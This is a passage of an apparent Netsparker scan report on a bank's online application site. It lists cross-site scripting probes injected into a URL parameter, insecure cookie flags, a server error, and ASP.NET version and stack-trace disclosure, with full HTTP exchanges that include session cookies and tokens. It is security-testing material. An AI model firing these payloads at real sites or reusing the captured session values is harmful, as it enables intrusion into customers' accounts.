<label for="chkboxRememberName" class="checkbox"><input id="ctl00_cphMainContent_chkboxRememberNum" type="checkbox" name="ctl00$cphMainContent$chkboxRememberNum" onclick="javascript:setTimeout('__doPostBack(\'ctl00$cphMainContent$chkboxRememberNum\',\'\')', 0)" tabindex="3" /> Remember my customer number*</label>
<p>*Only select this if this is your computer and it is not used by anyone else</p>

</div>

</div>
</div>
<p class="warning">For security reasons, when you have finished using Internet Banking always select SIGN OFF.</p>
</div>
<div id="sign-on-my-save">
<h2>Sign on to MySave</h2>
<div id="my-save-info">
<img src="/images/my-save.gif" alt="MySave Online Savings - Manage your MySave account online" />
<a id="ctl00_cphMainContent_linkWhatsThis" href="http://www.nationwide.co.uk/savings/aboutmysave.htm" target="_blank">What is MySave?</a>
</div>
<div id="my-save-sign-on">
<p>Sign on to your MySave account</p>
<input type="submit" name="ctl00$cphMainContent$btnMySave" value="Go to MySave >>" id="ctl00_cphMainContent_btnMySave" tabindex="3" class="button" />
</div>
</div>
</div>

</td>
<!--Final White Spacing column gap-->
<td width="5"><img src="/Images/pixel.gif" width="5" height="1" alt="" /></td>
</tr>
</table>

<input type="hidden" name="ctl00$cphMainContent$txtScreenResolution" id="ctl00_cphMainContent_txtScreenResolution" />
<input type="hidden" name="ctl00$cphMainContent$txtPersistentCookies" id="ctl00_cphMainContent_txtPersistentCookies" />
<input type="hidden" name="ctl00$cphMainContent$txtTimeZone" id="ctl00_cphMainContent_txtTimeZone" />
<input type="hidden" name="ctl00$cphMainContent$txtReferringUri" id="ctl00_cphMainContent_txtReferringUri" />


</div>

<div>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWCQK/odzJBQKTtdXfCAKequbgAgKFg47fDgKozL+oDAKh8OOtAQLs68+tCgLC6q+pCgL0ieNkEySahvRFhJYfWjY8sEuIf9Pzx4M=" />
</div></form>
</body>
</html>
- /Discovery/FullFlex/ApplicationRemote.aspx

/Discovery/FullFlex/ApplicationRemote.aspx

https://olb2.nationet.com/Discovery/FullFlex/ApplicationRemote.aspx?ID=%27%22%20ns=%20alert(0x0000E9..

Parameters

Parameter Type Value
ID GET '" ns= alert(0x0000E9)
GssToken GET 137240216200001lowzkvvgwwsrtpehwa1hcgzyWwwpMZ5nN9I*0d2GfW*Bqk8KBn4FecHGBCM*Rof9DeON/FTjxWndffvzxO6R*eUD

Request

GET /Discovery/FullFlex/ApplicationRemote.aspx?ID=%27%22%20ns=%20netsparker(0x0000E9)%20&GssToken=137240216200001lowzkvvgwwsrtpehwa1hcgzyWwwpMZ5nN9I*0d2GfW*Bqk8KBn4FecHGBCM*Rof9DeON%2fFTjxWndffvzxO6R*eUD HTTP/1.1
Referer: https://olb2.nationet.com/MyApplications/UnregisteredApplication.aspx?ID=3e16672fbeb645421c949ea4d5f68261e40&apptype=FLEXACCOUNT
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: olb2.nationet.com
Cookie: ASPSESSIONIDCAATARTS=BLMLIEGDLGCKJBEIBMLCBLMK; SessionTokenIdentifier=8626726362; CookieValidator=0; ASPSESSIONIDCAARCRRS=POGEJLADGAFGDEILEDCHKKNK; ASPSESSIONIDCSCRAQTQ=DNPLCBKDLGAPIIGIGMFOBOCL; ASPSESSIONIDAACRARSS=LCFMKEFDFNKKAHJFEHOLMBCN; ASP.NET_SessionId=54epn455vbbzwr55udve0345; ASPSESSIONIDAQDTDSQR=APDFCGIDNJBGDGMCIOHNHMNB; ASPSESSIONIDAACQBTSS=FBFJFDIDAOMEFFIJPLDGKCLN; ASPSESSIONIDAACSARST=EOPDDBKDMIPGPPPELLNLHJIF; ASPSESSIONIDCACRARSS=OJKPEEIDEGJCOAFIBLEAIFHN; ASPSESSIONIDCSDRBTRR=DKKJEIJDCDPJKDOLFIKDGEKD; ASPSESSIONIDCAARDSRS=DBIMLLADJCCNHLBCHNNNGCOI; ASPSESSIONIDCQCQDSRQ=FIKGNOADGNFBDEFBPBBFEIBN; ASPSESSIONIDAQATDTRQ=HCLINOADFMCFBJFFICAKOAOK; ASPSESSIONIDAADSCSQT=HCNNPDEDKJEALNAFMMLPEKFC; ASPSESSIONIDAQDTCTQR=OKCIBGDDMOEBOENOAGADLGEP; ASPSESSIONIDACBRDSQT=OFLDBLJDGHDLMBDAEADNMLCE; ASPSESSIONIDCSCTBTRQ=ENJIMOADIPAGMBCGDKDPKNLO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2197
Content-Type: text/html; charset=utf-8
Expires: -1
p3p: CP=ALL DSP COR CURa TAIi PSAa OUR BUS PHY ONL UNI FIN COM NAV DEM HEA PRE OTC
Date: Tue, 03 May 2011 01:11:34 GMT



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
<LINK REL='stylesheet' TYPE='text/css' href='../StyleSheets/ApplyOnLineBaseTemplate.css'>
</HEAD>
<BODY BGCOLOR="white">
<form>
<TABLE CELLSPACING="0" CELLPADDING="0" BORDER="0" ALIGN="center" width="80%">
<TR>
<TD>
<TABLE CELLSPACING="0" CELLPADDING="0" BORDER="1" WIDTH="100%" BORDERCOLOR="#cccccc">
<TR>
<TD COLSPAN="2">
<TABLE CELLSPACING="5" CELLPADDING="3" BORDER="0" WIDTH="100%">
<TR>
<TD class="formname">ERROR</TD>
<TD class="pagedescription"></TD>
</TR>
</TABLE>
</TD>
</TR>
<TR VALIGN="top">
<TD height="111">
<TABLE WIDTH="100%" CELLPADDING="0" CELLSPACING="2">
<TR VALIGN="top">
<TD>
<TABLE WIDTH="100%" cellpadding="5" cellspacing="3">
<TR>
<TD COLSPAN="2" class="forminformation" height="49">
<span id="ErrorTextHtml">An error occurred performing your request.<BR>A problem has occurred trying to process your request. Please try again later. If this problem persists please contact Nationwide Customer Services on 08457 30 20 10.</span>
</TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
<TABLE CELLSPACING="0" CELLPADDING="0" BORDER="0" ALIGN="right" WIDTH="100%">
<TR>
<TD ALIGN="left" height="2">&nbsp;</TD>
<TD ALIGN="right" height="30" valign="bottom">

</TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
</TD></TR></TABLE></form>
</BODY>
</HTML>

<HTML>
<HEAD>
<TITLE>Nationwide Applications</TITLE>
</HEAD>
<FRAMESET border="0" frameBorder="NO" frameSpacing="0" rows="83,*">
<FRAME marginHeight=5 marginWidth=0 name=topFrame noResize scrolling=no src="../FramePages/header_signedOn.aspx">
<FRAME marginHeight=15 marginWidth=0 name=mainFrame src="root.aspx?ID='" ns= netsparker(0x0000E9) " >
</FRAMESET>
</HTML>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /MyApplications/

/MyApplications/ CONFIRMED

https://olb2.nationet.com/MyApplications/

Identified Cookie

ASPSESSIONIDCSCRAQTQ

Request

GET /MyApplications/ HTTP/1.1
Referer: https://olb2.nationet.com/MyApplications/UnregisteredApplication.aspx?ID=3e16672fbeb645421c949ea4d5f68261e40&apptype=FLEXACCOUNT
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: olb2.nationet.com
Cookie: ASPSESSIONIDCAATARTS=BLMLIEGDLGCKJBEIBMLCBLMK; SessionTokenIdentifier=0396747136; CookieValidator=0; ASPSESSIONIDCAARCRRS=POGEJLADGAFGDEILEDCHKKNK
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 133
Content-Type: text/html
Expires: -1
Location: /default.asp
p3p: CP=ALL DSP COR CURa TAIi PSAa OUR BUS PHY ONL UNI FIN COM NAV DEM HEA PRE OTC
Set-Cookie: ASPSESSIONIDCSCRAQTQ=DNPLCBKDLGAPIIGIGMFOBOCL; path=/
Date: Tue, 03 May 2011 01:10:27 GMT


<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp">here</a>.</body>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /Discovery/FullFlex/ApplicationRemote.aspx

/Discovery/FullFlex/ApplicationRemote.aspx CONFIRMED

https://olb2.nationet.com/Discovery/FullFlex/ApplicationRemote.aspx?ID='%22--%3E%3C/style%3E%3C/scri..

Parameters

Parameter Type Value
ID GET '"--></style></script><script>netsparker(0x0000E1)</script>
GssToken GET 137240216200001lowzkvvgwwsrtpehwa1hcgzyWwwpMZ5nN9I*0d2GfW*Bqk8KBn4FecHGBCM*Rof9DeON/FTjxWndffvzxO6R*eUD

Request

GET /Discovery/FullFlex/ApplicationRemote.aspx?ID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E1)%3C/script%3E&GssToken=137240216200001lowzkvvgwwsrtpehwa1hcgzyWwwpMZ5nN9I*0d2GfW*Bqk8KBn4FecHGBCM*Rof9DeON%2fFTjxWndffvzxO6R*eUD HTTP/1.1
Referer: https://olb2.nationet.com/MyApplications/UnregisteredApplication.aspx?ID=3e16672fbeb645421c949ea4d5f68261e40&apptype=FLEXACCOUNT
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: olb2.nationet.com
Cookie: ASPSESSIONIDCAATARTS=BLMLIEGDLGCKJBEIBMLCBLMK; SessionTokenIdentifier=4434624482; CookieValidator=0; ASPSESSIONIDCAARCRRS=POGEJLADGAFGDEILEDCHKKNK; ASPSESSIONIDCSCRAQTQ=DNPLCBKDLGAPIIGIGMFOBOCL; ASPSESSIONIDAACRARSS=LCFMKEFDFNKKAHJFEHOLMBCN; ASP.NET_SessionId=a2ryhtbsoil0nnighlb24l45; ASPSESSIONIDAQDTDSQR=APDFCGIDNJBGDGMCIOHNHMNB; ASPSESSIONIDAACQBTSS=FBFJFDIDAOMEFFIJPLDGKCLN; ASPSESSIONIDAACSARST=EOPDDBKDMIPGPPPELLNLHJIF; ASPSESSIONIDCACRARSS=OJKPEEIDEGJCOAFIBLEAIFHN; ASPSESSIONIDCSDRBTRR=DKKJEIJDCDPJKDOLFIKDGEKD; ASPSESSIONIDCAARDSRS=DBIMLLADJCCNHLBCHNNNGCOI; ASPSESSIONIDCQCQDSRQ=FIKGNOADGNFBDEFBPBBFEIBN; ASPSESSIONIDAQATDTRQ=HCLINOADFMCFBJFFICAKOAOK; ASPSESSIONIDAADSCSQT=HCNNPDEDKJEALNAFMMLPEKFC; ASPSESSIONIDAQDTCTQR=OKCIBGDDMOEBOENOAGADLGEP; ASPSESSIONIDACBRDSQT=OFLDBLJDGHDLMBDAEADNMLCE; ASPSESSIONIDCSCTBTRQ=ENJIMOADIPAGMBCGDKDPKNLO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 6901
Content-Type: text/html; charset=utf-8
p3p: CP=ALL DSP COR CURa TAIi PSAa OUR BUS PHY ONL UNI FIN COM NAV DEM HEA PRE OTC
Date: Tue, 03 May 2011 01:11:32 GMT


<html>
<head>
<title>A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/Discovery' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>Request Validation has detected a potentially dangerous client input value, and processing of the request has been aborted. This value may indicate an attempt to compromise the security of your application, such as a cross-site scripting attack. You can disable request validation by setting validateRequest=false in the Page directive or in the <pages> configuration section. However, it is strongly recommended that your application explicitly check all inputs in this case.
<br><br>

<b> Exception Details: </b>System.Web.HttpRequestValidationException: A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[HttpRequestValidationException (0x80004005): A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).]
System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +3308446
System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName) +108
System.Web.HttpRequest.get_QueryString() +119
System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull) +2070504
System.Web.UI.Page.DeterminePostBackMode() +63
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +6978
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +213
System.Web.UI.Page.ProcessRequest() +86
System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context) +18
System.Web.UI.Page.ProcessRequest(HttpContext context) +49
ASP.fullflex_applicationremote_aspx.ProcessRequest(HttpContext context) +29
System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +303
System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously) +64
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.832; ASP.NET Version:2.0.50727.832

</font>

</body>
</html>
<!--
[HttpRequestValidationException]: A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).
at System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName)
at System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName)
at System.Web.HttpRequest.get_QueryString()
at System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull)
at System.Web.UI.Page.DeterminePostBackMode()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.fullflex_applicationremote_aspx.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /MyApplications/

/MyApplications/ CONFIRMED

https://olb2.nationet.com/MyApplications/

Identified Cookie

ASPSESSIONIDCSCRAQTQ

Request

GET /MyApplications/ HTTP/1.1
Referer: https://olb2.nationet.com/MyApplications/UnregisteredApplication.aspx?ID=3e16672fbeb645421c949ea4d5f68261e40&apptype=FLEXACCOUNT
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: olb2.nationet.com
Cookie: ASPSESSIONIDCAATARTS=BLMLIEGDLGCKJBEIBMLCBLMK; SessionTokenIdentifier=0396747136; CookieValidator=0; ASPSESSIONIDCAARCRRS=POGEJLADGAFGDEILEDCHKKNK
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 133
Content-Type: text/html
Expires: -1
Location: /default.asp
p3p: CP=ALL DSP COR CURa TAIi PSAa OUR BUS PHY ONL UNI FIN COM NAV DEM HEA PRE OTC
Set-Cookie: ASPSESSIONIDCSCRAQTQ=DNPLCBKDLGAPIIGIGMFOBOCL; path=/
Date: Tue, 03 May 2011 01:10:27 GMT


<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp">here</a>.</body>
ASP.NET Version Disclosure

ASP.NET Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from X-AspNet-Version banner of HTTP response or default ASP.NET error page.

Impact

An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.

Remedy

Apply the following changes on your web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses.
<System.Web>
     < httpRuntime enableVersionHeader="false" /> 
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /Discovery/FullFlex/ApplicationRemote.aspx

/Discovery/FullFlex/ApplicationRemote.aspx

https://olb2.nationet.com/Discovery/FullFlex/ApplicationRemote.aspx?ID='%22--%3E%3C/style%3E%3C/scri..

Extracted Version

Microsoft .NET Framework Version:2.0.50727.832; ASP.NET Version:2.0.50727.832

Request

GET /Discovery/FullFlex/ApplicationRemote.aspx?ID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E1)%3C/script%3E&GssToken=137240216200001lowzkvvgwwsrtpehwa1hcgzyWwwpMZ5nN9I*0d2GfW*Bqk8KBn4FecHGBCM*Rof9DeON%2fFTjxWndffvzxO6R*eUD HTTP/1.1
Referer: https://olb2.nationet.com/MyApplications/UnregisteredApplication.aspx?ID=3e16672fbeb645421c949ea4d5f68261e40&apptype=FLEXACCOUNT
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: olb2.nationet.com
Cookie: ASPSESSIONIDCAATARTS=BLMLIEGDLGCKJBEIBMLCBLMK; SessionTokenIdentifier=4434624482; CookieValidator=0; ASPSESSIONIDCAARCRRS=POGEJLADGAFGDEILEDCHKKNK; ASPSESSIONIDCSCRAQTQ=DNPLCBKDLGAPIIGIGMFOBOCL; ASPSESSIONIDAACRARSS=LCFMKEFDFNKKAHJFEHOLMBCN; ASP.NET_SessionId=a2ryhtbsoil0nnighlb24l45; ASPSESSIONIDAQDTDSQR=APDFCGIDNJBGDGMCIOHNHMNB; ASPSESSIONIDAACQBTSS=FBFJFDIDAOMEFFIJPLDGKCLN; ASPSESSIONIDAACSARST=EOPDDBKDMIPGPPPELLNLHJIF; ASPSESSIONIDCACRARSS=OJKPEEIDEGJCOAFIBLEAIFHN; ASPSESSIONIDCSDRBTRR=DKKJEIJDCDPJKDOLFIKDGEKD; ASPSESSIONIDCAARDSRS=DBIMLLADJCCNHLBCHNNNGCOI; ASPSESSIONIDCQCQDSRQ=FIKGNOADGNFBDEFBPBBFEIBN; ASPSESSIONIDAQATDTRQ=HCLINOADFMCFBJFFICAKOAOK; ASPSESSIONIDAADSCSQT=HCNNPDEDKJEALNAFMMLPEKFC; ASPSESSIONIDAQDTCTQR=OKCIBGDDMOEBOENOAGADLGEP; ASPSESSIONIDACBRDSQT=OFLDBLJDGHDLMBDAEADNMLCE; ASPSESSIONIDCSCTBTRQ=ENJIMOADIPAGMBCGDKDPKNLO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 6901
Content-Type: text/html; charset=utf-8
p3p: CP=ALL DSP COR CURa TAIi PSAa OUR BUS PHY ONL UNI FIN COM NAV DEM HEA PRE OTC
Date: Tue, 03 May 2011 01:11:32 GMT


<html>
<head>
<title>A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/Discovery' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>Request Validation has detected a potentially dangerous client input value, and processing of the request has been aborted. This value may indicate an attempt to compromise the security of your application, such as a cross-site scripting attack. You can disable request validation by setting validateRequest=false in the Page directive or in the <pages> configuration section. However, it is strongly recommended that your application explicitly check all inputs in this case.
<br><br>

<b> Exception Details: </b>System.Web.HttpRequestValidationException: A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[HttpRequestValidationException (0x80004005): A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).]
System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +3308446
System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName) +108
System.Web.HttpRequest.get_QueryString() +119
System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull) +2070504
System.Web.UI.Page.DeterminePostBackMode() +63
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +6978
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +213
System.Web.UI.Page.ProcessRequest() +86
System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context) +18
System.Web.UI.Page.ProcessRequest(HttpContext context) +49
ASP.fullflex_applicationremote_aspx.ProcessRequest(HttpContext context) +29
System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +303
System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously) +64
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.832; ASP.NET Version:2.0.50727.832

</font>

</body>
</html>
<!--
[HttpRequestValidationException]: A potentially dangerous Request.QueryString value was detected from the client (ID=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).
at System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName)
at System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName)
at System.Web.HttpRequest.get_QueryString()
at System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull)
at System.Web.UI.Page.DeterminePostBackMode()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.fullflex_applicationremote_aspx.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
ASP.NET Stack Trace Disclosure

ASP.NET Stack Trace Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET stack trace data in the HTTP response.

Impact

An attacker can obtain information such as: This information can help an attacker to gain more information and to potentially focus the development of further attacks for the target system.

Remedy

Apply following changes on your web.config file to prevent information leakage by applying custom error pages.
<System.Web>
